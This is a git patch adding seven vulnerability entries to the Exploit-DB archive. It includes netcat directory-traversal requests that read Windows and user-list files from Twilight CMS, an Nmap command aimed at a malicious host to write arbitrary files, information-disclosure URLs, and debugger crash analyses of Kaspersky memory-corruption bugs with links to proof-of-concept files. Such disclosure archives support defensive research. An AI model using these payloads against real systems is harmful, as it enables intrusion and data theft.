From 95a1b072fe4a544882902e03a30971992c23c059 Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Wed, 18 Nov 2015 05:02:21 +0000
Subject: [PATCH] DB: 2015-11-18

7 new exploits
---
 files.csv                          |  13 +++-
 platforms/java/webapps/38739.txt   |   9 +++
 platforms/linux/remote/38741.txt   |   9 +++
 platforms/php/webapps/38737.txt    |  14 ++++
 platforms/php/webapps/38740.txt    |   9 +++
 platforms/python/webapps/38738.txt |   9 +++
 platforms/windows/dos/38735.txt    |  39 +++++++++++
 platforms/windows/dos/38736.txt    | 103 +++++++++++++++++++++++++++++
 8 files changed, 202 insertions(+), 3 deletions(-)
 create mode 100755 platforms/java/webapps/38739.txt
 create mode 100755 platforms/linux/remote/38741.txt
 create mode 100755 platforms/php/webapps/38737.txt
 create mode 100755 platforms/php/webapps/38740.txt
 create mode 100755 platforms/python/webapps/38738.txt
 create mode 100755 platforms/windows/dos/38735.txt
 create mode 100755 platforms/windows/dos/38736.txt

diff --git a/files.csv b/files.csv
index 77ab61b8e..72b4a9ff9 100755
--- a/files.csv
+++ b/files.csv
@@ -32058,7 +32058,7 @@ id,file,description,date,author,platform,type,port
 35575,platforms/php/webapps/35575.txt,"PrestaShop 1.3.6 - 'cms.php' Remote File Include Vulnerability",2011-04-08,KedAns-Dz,php,webapps,0
 35576,platforms/asp/webapps/35576.txt,"Omer Portal 3.220060425 - 'arama_islem.asp' Cross-Site Scripting Vulnerability",2011-04-07,"kurdish hackers team",asp,webapps,0
 35577,platforms/php/webapps/35577.txt,"vtiger CRM 5.2.1 - 'vtigerservice.php' Cross-Site Scripting Vulnerability",2011-04-07,"AutoSec Tools",php,webapps,0
-35578,platforms/php/webapps/35578.sh,"Cacti Superlinks Plugin 1.4-2 RCE(LFI) via SQL Injection Exploit",2014-12-19,Wireghoul,php,webapps,0
+35578,platforms/php/webapps/35578.sh,"Cacti Superlinks Plugin 1.4-2 - RCE (LFI) via SQL Injection Exploit",2014-12-19,Wireghoul,php,webapps,0
 35579,platforms/php/webapps/35579.txt,"miniBB 3.1 - Blind SQL Injection",2014-12-19,"Kacper Szurek",php,webapps,80
 35580,platforms/linux/dos/35580.rb,"Ettercap 0.8.0-0.8.1 - Multiple Denial of Service Vulnerabilities",2014-12-19,"Nick Sampanis",linux,dos,0
 35581,platforms/linux/remote/35581.rb,"Varnish Cache CLI Interface - Remote Code Execution",2014-12-19,"Patrick Webster",linux,remote,6082
@@ -34913,8 +34913,8 @@ id,file,description,date,author,platform,type,port
 38633,platforms/multiple/remote/38633.pl,"Intelligent Platform Management Interface Information Disclosure Vulnerability",2013-07-02,"Dan Farmer",multiple,remote,0
 38634,platforms/ios/remote/38634.txt,"Air Drive Plus Multiple Input Vallidation Vulnerabilities",2013-07-09,"Benjamin Kunz Mejri",ios,remote,0
 38635,platforms/php/webapps/38635.txt,"iVote 'details.php' SQL Injection Vulnerability",2013-07-10,"Ashiyane Digital Security Team",php,webapps,0
-38636,platforms/multiple/remote/38636.txt,"Cryptocat Chrome Extension 'img/keygen.gif' File Information Disclosure Vulnerability",2012-11-07,"Mario Heiderich",multiple,remote,0
-38637,platforms/multiple/remote/38637.txt,"Cryptocat Arbitrary Script Injection Vulnerability",2015-11-07,"Mario Heiderich",multiple,remote,0
+38636,platforms/multiple/remote/38636.txt,"Cryptocat 2.0.21 Chrome Extension - 'img/keygen.gif' File Information Disclosure Vulnerability",2012-11-07,"Mario Heiderich",multiple,remote,0
+38637,platforms/multiple/remote/38637.txt,"Cryptocat 2.0.22 - Arbitrary Script Injection Vulnerability",2012-11-07,"Mario Heiderich",multiple,remote,0
 38638,platforms/php/webapps/38638.txt,"Mintboard Multiple Cross Site Scripting Vulnerabilities",2013-07-10,"Canberk BOLAT",php,webapps,0
 38639,platforms/php/webapps/38639.txt,"miniBB SQL Injection and Multiple Cross Site Scripting Vulnerabilities",2013-07-11,Netsparker,php,webapps,0
 38640,platforms/multiple/webapps/38640.rb,"OpenSSL Alternative Chains Certificate Forgery",2015-11-05,"Ramon de C Valle",multiple,webapps,0
@@ -35006,3 +35006,10 @@ id,file,description,date,author,platform,type,port
 38732,platforms/php/remote/38732.rb,"Idera Up.Time Monitoring Station 7.0 post2file.php Arbitrary File Upload",2015-11-16,metasploit,php,remote,9999
 38733,platforms/php/remote/38733.rb,"Idera Up.Time Monitoring Station 7.4 post2file.php Arbitrary File Upload",2015-11-16,metasploit,php,remote,9999
 38734,platforms/windows/dos/38734.txt,"Kaspersky Antivirus - Certificate Handling Path Traversal",2015-11-16,"Google Security Research",windows,dos,0
+38735,platforms/windows/dos/38735.txt,"Kaspersky Antivirus - DEX File Format Memory Corruption",2015-11-16,"Google Security Research",windows,dos,0
+38736,platforms/windows/dos/38736.txt,"Kaspersky Antivirus - ZIP File Format Use-After-Free Vulnerability",2015-11-16,"Google Security Research",windows,dos,0
+38737,platforms/php/webapps/38737.txt,"Twilight CMS DeWeS Web Server Directory Traversal Vulnerability",2013-08-21,"High-Tech Bridge",php,webapps,0
+38738,platforms/python/webapps/38738.txt,"Plone 'in_portal.py' <= 4.1.3 Session Hijacking Vulnerability",2013-07-31,"Cyrill Bannwart",python,webapps,0
+38739,platforms/java/webapps/38739.txt,"SearchBlox Multiple Information Disclosure Vulnerabilities",2013-08-23,"Ricky Roane Jr",java,webapps,0
+38740,platforms/php/webapps/38740.txt,"cm3 Acora CMS 'top.aspx' Information Disclosure Vulnerability",2013-08-26,"Pedro Andujar",php,webapps,0
+38741,platforms/linux/remote/38741.txt,"Nmap Arbitrary File Write Vulnerability",2013-08-06,"Piotr Duszynski",linux,remote,0
diff --git a/platforms/java/webapps/38739.txt b/platforms/java/webapps/38739.txt
new file mode 100755
index 000000000..e9b9d6dc8
--- /dev/null
+++ b/platforms/java/webapps/38739.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/61974/info
+
+SearchBlox is prone to multiple information-disclosure vulnerabilities.
+
+Attackers can exploit these issues to obtain sensitive information that may aid in launching further attacks.
+
+SearchBlox 7.4 Build 1 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/searchblox/servlet/CollectionListServlet?action=getList&orderBy=colName&direction=asc 
\ No newline at end of file
diff --git a/platforms/linux/remote/38741.txt b/platforms/linux/remote/38741.txt
new file mode 100755
index 000000000..102a642bc
--- /dev/null
+++ b/platforms/linux/remote/38741.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/62024/info
+
+Nmap is prone to an arbitrary file-write vulnerability.
+
+An attacker can exploit this issue to write arbitrary files with the permissions of the user running the nmap client. This will allow the attacker to fully compromise the affected machine.
+
+Nmap 6.25 is vulnerable; other versions may also be affected. 
+
+nmap --script domino-enum-passwords -p 80 <evil_host> --script-args domino-enum-passwords.username='patrik karlsson',domino-enum-passwords.password=secret,domino-enum-passwords.idpath='/tmp'
\ No newline at end of file
diff --git a/platforms/php/webapps/38737.txt b/platforms/php/webapps/38737.txt
new file mode 100755
index 000000000..2fe8587be
--- /dev/null
+++ b/platforms/php/webapps/38737.txt
@@ -0,0 +1,14 @@
+source: http://www.securityfocus.com/bid/61906/info
+
+Twilight CMS is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input.
+
+Remote attackers can use specially crafted requests with directory-traversal sequences ('../') to retrieve arbitrary files in the context of the application.
+
+Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks.
+
+Twilight CMS 0.4.2 is vulnerable; other versions may also be affected. 
+
+nc [www.example.com] 80 GET /..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/windows/win.ini HTTP/1.1
+
+nc [www.example.com] 80 GET demosite/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/TwilightCMS/Sites/company_site/Data/user list.dat HTTP/1.1
+
diff --git a/platforms/php/webapps/38740.txt b/platforms/php/webapps/38740.txt
new file mode 100755
index 000000000..98d96b601
--- /dev/null
+++ b/platforms/php/webapps/38740.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/62010/info
+
+cm3 Acora CMS is prone to an information-disclosure vulnerability.
+
+Successful exploits of this issue lead to disclosure of sensitive information which may aid in launching further attacks. 
+
+http://www.example.com/AcoraCMS/Admin/top.aspx
+
+<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTQ4NjIxMDUxOQ9kFgJmD2QWAgIDD2QWAgIBD2QWCmYPFgIeBFRleHQFJERpZ2l0YWxTZWMgTmV0d29ya3MgV2Vic2l0ZWQCAQ8WAh8ABQpFbnRlcnByaXNlZAICDw8WAh8ABQt2NS40LjUvNGEtY2RkAgMPFgIfAAUgQW5vbnltb3VzIChQdWJsaWMgSW50ZXJuZXQgVXNlcilkAgQPDxYCHgdWaXNpYmxlaGRkZIL9u8OSlqqnBHGwtssOBV5lciAoCg" /></div> 
\ No newline at end of file
diff --git a/platforms/python/webapps/38738.txt b/platforms/python/webapps/38738.txt
new file mode 100755
index 000000000..ffd6f5bf3
--- /dev/null
+++ b/platforms/python/webapps/38738.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/61964/info
+
+Plone is prone to a session-hijacking vulnerability.
+
+An attacker can exploit this issue to hijack user sessions and gain unauthorized access to the affected application.
+
+Note: This issue was previously discussed in the BID 61544 (Plone Multiple Remote Security Vulnerabilities), but has been moved to its own record to better document it. 
+
+https://www.example.com/acl_users/credentials_cookie_auth/require_login?next=+https%3A//www.csnc.ch 
\ No newline at end of file
diff --git a/platforms/windows/dos/38735.txt b/platforms/windows/dos/38735.txt
new file mode 100755
index 000000000..46f0c7e84
--- /dev/null
+++ b/platforms/windows/dos/38735.txt
@@ -0,0 +1,39 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=529
+
+The attached testcase was found by fuzzing DEX files, and results in a heap overflow with a wild memcpy. Note that Kaspersky catch exceptions and continue execution, so running into unmapped pages doesn't terminate the process, this should make exploitation quite realistic.
+
+(bb8.ac0): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+eax=0c0b2074 ebx=ffffffff ecx=3ffd419c edx=00000003 esi=0c161a01 edi=0c170000
+eip=72165157 esp=046ceed8 ebp=046ceee0 iopl=0         nv up ei pl nz na po nc
+cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
+avengine_dll!ekaGetObjectFactory+0x51537:
+72165157 f3a5            rep movs dword ptr es:[edi],dword ptr [esi]
+0:023> dd edi
+0c170000  ???????? ???????? ???????? ????????
+0c170010  ???????? ???????? ???????? ????????
+0c170020  ???????? ???????? ???????? ????????
+0c170030  ???????? ???????? ???????? ????????
+0c170040  ???????? ???????? ???????? ????????
+0c170050  ???????? ???????? ???????? ????????
+0c170060  ???????? ???????? ???????? ????????
+0c170070  ???????? ???????? ???????? ????????
+0:023> dd esi
+0c161a01  00000000 00000000 00000000 00000000
+0c161a11  00000000 00000000 00000000 00000000
+0c161a21  00000000 00000000 00000000 00000000
+0c161a31  00000000 00000000 00000000 00000000
+0c161a41  00000000 00000000 00000000 00000000
+0c161a51  00000000 00000000 00000000 00000000
+0c161a61  00000000 00000000 00000000 00000000
+0c161a71  00000000 00000000 00000000 00000000
+0:023> kvn1
+ # ChildEBP RetAddr  Args to Child              
+00 046ceee0 15c01af7 0c0c0674 0c0b2075 ffffffff avengine_dll!ekaGetObjectFactory+0x51537
+
+This vulnerability is exploitable for remote code execution as NT AUTHORITY\SYSTEM.
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38735.zip
+
diff --git a/platforms/windows/dos/38736.txt b/platforms/windows/dos/38736.txt
new file mode 100755
index 000000000..be0f9e55d
--- /dev/null
+++ b/platforms/windows/dos/38736.txt
@@ -0,0 +1,103 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=521
+
+Fuzzing the ZIP file format found multiple memory corruption issues, some of which are obviously exploitable for remote code execution as NT AUTHORITY\SYSTEM on any system with Kaspersky Antivirus.
+
+This testcase should fault by jumping to an unmapped address
+
+(aac.fa4): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+eax=cccccccc ebx=00000000 ecx=01bc2974 edx=73a10002 esi=02e0a598 edi=5b2266bb
+eip=cccccccc esp=05dde330 ebp=05dde354 iopl=0         nv up ei pl nz na po nc
+cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
+cccccccc ??              ???
+
+# where did that come from?
+
+0:036> kvn 2
+ # ChildEBP RetAddr  Args to Child              
+00 05dde32c 739fd847 02e0a598 05dde370 00000000 0xcccccccc
+01 05dde354 739fe438 01bc2974 002266bb 05dde370 prcore!PragueUnload+0x2687
+
+0:036> ub 739fd847 L9
+prcore!PragueUnload+0x2673:
+739fd833 8b4d08          mov     ecx,dword ptr [ebp+8]
+739fd836 8b7104          mov     esi,dword ptr [ecx+4]
+739fd839 8975ec          mov     dword ptr [ebp-14h],esi
+739fd83c 85f6            test    esi,esi
+739fd83e 740a            je      prcore!PragueUnload+0x268a (739fd84a)
+739fd840 8b16            mov     edx,dword ptr [esi]
+739fd842 8b02            mov     eax,dword ptr [edx]
+739fd844 56              push    esi
+739fd845 ffd0            call    eax
+
+# that pointer is in edx
+
+0:088> dd edx
+739a0002  cccccccc cccccccc cccccccc 8b55cccc
+739a0012  77e95dec ccffffff cccccccc 8b55cccc
+739a0022  0c4d8bec 8b04418b 42390855 501a7504
+739a0032  0a8b018b d3e85150 83fffff9 c0850cc4
+739a0042  01b80775 5d000000 5dc033c3 8b55ccc3
+739a0052  0c4d8bec 8b04418b 42390855 501a7504
+739a0062  0a8b018b 63e85150 83fffff9 c0850cc4
+739a0072  01b80775 5d000000 5dc033c3 6c83ccc3
+
+# So what is that?
+
+0:088> !address edx
+Usage:                  Image
+Base Address:           73971000
+End Address:            739aa000
+Region Size:            00039000
+State:                  00001000	MEM_COMMIT
+Protect:                00000020	PAGE_EXECUTE_READ
+Type:                   01000000	MEM_IMAGE
+Allocation Base:        73970000
+Allocation Protect:     00000080	PAGE_EXECUTE_WRITECOPY
+Image Path:             C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 15.0.2\prcore.dll
+Module Name:            prcore
+Loaded Image Name:      C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 15.0.2\prcore.dll
+Mapped Image Name:      
+0:088> !chkimg prcore
+0 errors : prcore 
+
+# Hmm, so why is esi pointing there?
+
+0:088> !address esi
+                                    
+Mapping file section regions...
+Mapping module regions...
+Mapping PEB regions...
+Mapping TEB and stack regions...
+Mapping heap regions...
+Mapping page heap regions...
+Mapping other regions...
+Mapping stack trace database regions...
+Mapping activation context regions...
+
+
+Usage:                  Heap
+Base Address:           02a00000
+End Address:            02c33000
+Region Size:            00233000
+State:                  00001000	MEM_COMMIT
+Protect:                00000004	PAGE_READWRITE
+Type:                   00020000	MEM_PRIVATE
+Allocation Base:        02a00000
+Allocation Protect:     00000004	PAGE_READWRITE
+More info:              heap owning the address: !heap 0x4a0000
+More info:              heap segment
+More info:              heap entry containing the address: !heap -x 0x2bf4760
+
+
+0:088> !heap -x 0x2bf4760
+Entry     User      Heap      Segment       Size  PrevSize  Unused    Flags
+-----------------------------------------------------------------------------
+02bf4758  02bf4760  004a0000  02b00ac8        60      -            0  LFH;free 
+
+# So looks like an exploitable use after free vulnerability.
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38736.zip
+